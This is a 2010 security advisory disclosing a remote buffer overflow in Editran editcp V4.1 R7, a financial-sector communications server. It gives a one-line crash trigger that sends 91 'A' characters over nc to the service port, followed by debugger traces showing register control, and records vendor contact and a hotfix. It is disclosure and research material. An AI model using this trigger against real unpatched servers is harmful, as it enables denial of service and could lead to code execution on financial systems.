===============================
                   - Advisory -
          ===============================

  Tittle:   Editran editcp V4.1 R7 - Remote buffer overflow
    Risk:   High
    Date:   25.Jun.2010
  Author:   Pedro Andujar <pandujar *@* segfault.es>
   
              
.: [ INTRO ] :.

EDItran Communications Platform: this is the market standard for the Spanish financial sector in the area of communications. 
It comprises an exchange architecture between heterogeneous environments for data networks (tcp, x.25, x.28, LU6.2, SwiftNet) 
and the Internet. It is the only product homologated by BDE (Central Bank of Spain) for the transmission of Official Reporting.

This software which is commercialized by Indra, is highly deployed in the financial, inssurance and gubernamental environments.


.: [ TECHNICAL DESCRIPTION ] :.

Editran editcp V4.1 R7 is prone to a remote buffer overflow because the software fails to perform adequate boundary checks on 
user-supplied data. This issue could allow a malicious user to perform denial of service attacks or run arbitrary code with the
application context privileges on an affected server.


This issue has been tested on Aix 5.3.9 ppc.


  pandujar@ITSec01 /tmp$ perl -e '{print "A"x91}' | nc 192.168.1.164 7777


  bash-3.2# tail -f editcp.out
  *** Arranque  *** - editran - Tue Jun 22 14:53:02 CDT 2010
  editcp tcp V4.1 R7 - Jan 22 2007
  Copyright (C) 1991-2004 INDRA
  22/06/2010 14:53:02.627 editcp (372968) Licencia correcta (tcp).
  22/06/2010 14:53:02.627 editcp (372968) LISTEN TCP address 192.168.1.164:7777.
  22/06/2010 14:53:36.650 editcp (372968) Recibida señal (sig=11).

  bash-3.2# /tmp/dbx -C core
  reading symbolic information ...warning: no source compiled with -g

  Segmentation fault in lsConnectionCached at 0x10008298
  0x10008298 (lsConnectionCached+0x54) 7d69582e        lwzx   r11,r9,r11

  (/tmp/dbx) where
  lsConnectionCached(0x41ffffff) at 0x10008298
  SOCKSclose(0x41ffffff) at 0x10006548
  NetClose() at 0x100036d8
  SigHaltHandler(??) at 0x10000958
  SearchEvent(??) at 0x100037dc
  WaitForIncomingEvent() at 0x10003418
  WaitForEvent() at 0x10002e44
  main(??, ??) at 0x1000078c

  (/tmp/dbx) print $pc
  0x10008298

  (/tmp/dbx) registers
  $r0:0x100036dc    $stkp:0x2ff1e090  $toc:0x20082164   $r3:0x41ffffff
  $r4:0x00000001    $r5:0x00000000    $r6:0x0000f0b2    $r7:0x00000001
  $r8:0x00000001    $r9:0x20083f60    $r10:0x00000002   $r11:0x08282828
  $r12:0x40445980   $r13:0x00000000   $r14:0x2ff1e200   $r15:0x000000a1
  $r16:0x00000002   $r17:0x200820f8   $r18:0xdeadbeef   $r19:0xdeadbeef
  $r20:0x0000000b   $r21:0x0000000b   $r22:0x00012000   $r23:0x2ff47600
  $r24:0x00012000   $r25:0x00000000   $r26:0x0101ea00   $r27:0x2370b400
  $r28:0x00000000   $r29:0x2009c528   $r30:0x2008ab68   $r31:0x2ff1e090
  $iar:0x10008298   $msr:0x0000d0b2   $cr:0x44222224    $link:0x1000654c
  $ctr:0x00000000   $xer:0x00000000   $mq:0xdeadbeef

  (/tmp/dbx) listi main
  0x10000468 (main)      7c6802a6        mflr   r3
  0x1000046c (main+0x4)  93a1fff4         stw   r29,-12(r1)
  0x10000470 (main+0x8)  7c9d2378          mr   r29,r4
  0x10000474 (main+0xc)  93c1fff8         stw   r30,-8(r1)
  0x10000478 (main+0x10) 3bc00000          li   r30,0x0
  0x1000047c (main+0x14) 90610008         stw   r3,0x8(r1)
  0x10000480 (main+0x18) 93e1fffc         stw   r31,-4(r1)
  0x10000484 (main+0x1c) 9421faa8        stwu   r1,-1368(r1)
  0x10000488 (main+0x20) 80640000         lwz   r3,0x0(r4)
  0x1000048c (main+0x24) 3880002f          li   r4,0x2f


If we increment the amount of "A"'s to 100, the whole r3 register is overwritten:

  (/tmp/dbx) frame
  lsConnectionCached(0x41414141) at 0x10008298

  (/tmp/dbx) dump
  lsConnectionCached(0x41414141) at 0x100082b4

  (/tmp/dbx) listi
  0x10008298 (lsConnectionCached+0x54) 7d69582e        lwzx   r11,r9,r11
  0x1000829c (lsConnectionCached+0x58) 7d495838         and   r9,r10,r11
  0x100082a0 (lsConnectionCached+0x5c) 2c890000        cmpi   cr1,0x0,r9,0x0
  0x100082a4 (lsConnectionCached+0x60) 40860010         bne   cr1,0x100082b4 (lsConnectionCached+0x70)
  0x100082a8 (lsConnectionCached+0x64) 48000004           b   0x100082ac (lsConnectionCached+0x68)
  0x100082ac (lsConnectionCached+0x68) 38600000          li   r3,0x0
  0x100082b0 (lsConnectionCached+0x6c) 48000098           b   0x10008348 (lsConnectionCached+0x104)
  0x100082b4 (lsConnectionCached+0x70) 60000000         ori   r0,r0,0x0
  0x100082b8 (lsConnectionCached+0x74) 81220360         lwz   r9,0x360(r2)
  0x100082bc (lsConnectionCached+0x78) 81690000         lwz   r11,0x0(r9)

  (/tmp/dbx) listi lsConnectionCached
  0x10008244 (lsConnectionCached)      93e1fffc         stw   r31,-4(r1)
  0x10008248 (lsConnectionCached+0x4)  9421ffd8        stwu   r1,-40(r1)
  0x1000824c (lsConnectionCached+0x8)  7c3f0b78          mr   r31,r1
  0x10008250 (lsConnectionCached+0xc)  907f0040         stw   r3,0x40(r31)
  0x10008254 (lsConnectionCached+0x10) 8122033c         lwz   r9,0x33c(r2)
  0x10008258 (lsConnectionCached+0x14) 81690000         lwz   r11,0x0(r9)
  0x1000825c (lsConnectionCached+0x18) 2c8b0000        cmpi   cr1,0x0,r11,0x0
  0x10008260 (lsConnectionCached+0x1c) 4186004c         beq   cr1,0x100082ac (lsConnectionCached+0x68)
  0x10008264 (lsConnectionCached+0x20) 813f0040         lwz   r9,0x40(r31)
  0x10008268 (lsConnectionCached+0x24) 3960ffff          li   r11,-1


Debug of live process, where the old r3 value is stored on r31:

  (/tmp/dbx) run
  editcp tcp V4.1 R7 - Jan 22 2007
  Copyright (C) 1991-2004 INDRA
  25/06/2010 16:31:39.903 editcp (356528) Licencia correcta (tcp).
  25/06/2010 16:31:39.903 editcp (356528) LISTEN TCP address 192.168.1.164:7777.

  Segmentation fault in SearchEvent at 0x100037dc ($t1)
  0x100037dc (SearchEvent+0x10) 7caa202e        lwzx   r5,r10,r4

  (/tmp/dbx) x
  $r0:0x00000001    $stkp:0x2ff1e5a0   $toc:0x20082164   $r3:0x00000001
  $r4:0x200855f8    $r5:0x200a46c0     $r6:0x00000df0    $r7:0x00000000
  $r8:0x00000000    $r9:0xf03a51b0     $r10:0x08282828   $r11:0x00000002
  $r12:0x100017bc   $r13:0xdeadbeef    $r14:0x00000001   $r15:0x2ff22c90
  $r16:0x2ff22c98   $r17:0x00000000    $r18:0xdeadbeef   $r19:0xdeadbeef
  $r20:0xdeadbeef   $r21:0xdeadbeef    $r22:0xdeadbeef   $r23:0x200820ec
  $r24:0x100033e0   $r25:0xdeadbeef    $r26:0xdeadbeef   $r27:0x00000001
  $r28:0x00000000   $r29:0x2009c528    $r30:0x20089c18   $r31:0x41414141
  $iar:0x100037dc   $msr:0x0000d0b2    $cr:0x48222224    $link:0x1000341c
  $ctr:0xd03c46fc   $xer:0x00000004    $mq:0xdeadbeef

  (/tmp/dbx) print $pc
  0x100037dc

  (/tmp/dbx) listi SearchEvent
  0x100037cc (SearchEvent)      80820088         lwz   r4,0x88(r2)
  0x100037d0 (SearchEvent+0x4)  546ae8fa      rlwinm   r10,r3,0x1d,0x3,0x1d
  0x100037d4 (SearchEvent+0x8)  39600002          li   r11,0x2
  0x100037d8 (SearchEvent+0xc)  546306fe      rlwinm   r3,r3,0x0,0x1b,0x1f
  0x100037dc (SearchEvent+0x10) 7caa202e        lwzx   r5,r10,r4
  0x100037e0 (SearchEvent+0x14) 7ca41e30        sraw   r4,r5,r3
  0x100037e4 (SearchEvent+0x18) 70890001       andi.   r9,r4,0x1
  0x100037e8 (SearchEvent+0x1c) 40820024         bne   0x1000380c (SearchEvent+0x40)
  0x100037ec (SearchEvent+0x20) 8102008c         lwz   r8,0x8c(r2)
  0x100037f0 (SearchEvent+0x24) 7cea402e        lwzx   r7,r10,r8

  (/tmp/dbx) listi lsConnectionCached
  0x10008244 (lsConnectionCached)      93e1fffc         stw   r31,-4(r1)
  0x10008248 (lsConnectionCached+0x4)  9421ffd8        stwu   r1,-40(r1)
  0x1000824c (lsConnectionCached+0x8)  7c3f0b78          mr   r31,r1
  0x10008250 (lsConnectionCached+0xc)  907f0040         stw   r3,0x40(r31)
  0x10008254 (lsConnectionCached+0x10) 8122033c         lwz   r9,0x33c(r2)
  0x10008258 (lsConnectionCached+0x14) 81690000         lwz   r11,0x0(r9)
  0x1000825c (lsConnectionCached+0x18) 2c8b0000        cmpi   cr1,0x0,r11,0x0
  0x10008260 (lsConnectionCached+0x1c) 4186004c         beq   cr1,0x100082ac (lsConnectionCached+0x68)
  0x10008264 (lsConnectionCached+0x20) 813f0040         lwz   r9,0x40(r31)
  0x10008268 (lsConnectionCached+0x24) 3960ffff          li   r11,-1


.: [ CHANGELOG ] :.

  * 22/Jun/2010:   - Vulnerability discovered.
  * 22/Jun/2010:   - Vendor contacted.
  * 23/Jun/2010:   - Vendor response providing hotfix.
  * 05/Jul/2010:   - Public disclosure.


.: [ SOLUTIONS ] :.

Vendor hotfix is available.


.: [ ACKNOWLEDGEMENTS ] :.

Ricardo @Indra for the quick response and patch.


.: [ REFERENCES ] :.

   [+] Editran 
    http://www.editran.info/

   [+] Indra
    http://www.indracompany.com/en/soluciones-y-servicios/solucion/digital-market/offering

   [+] Indra/PPT
    http://bit.ly/9JTeiL

   [+] Banco de España
    http://www.bde.es/webbde/es/secciones/servicio/redbde/redbde.html

   [+] !dSR - Digital Security Research
    http://www.digitalsec.net/




                    -=EOF=-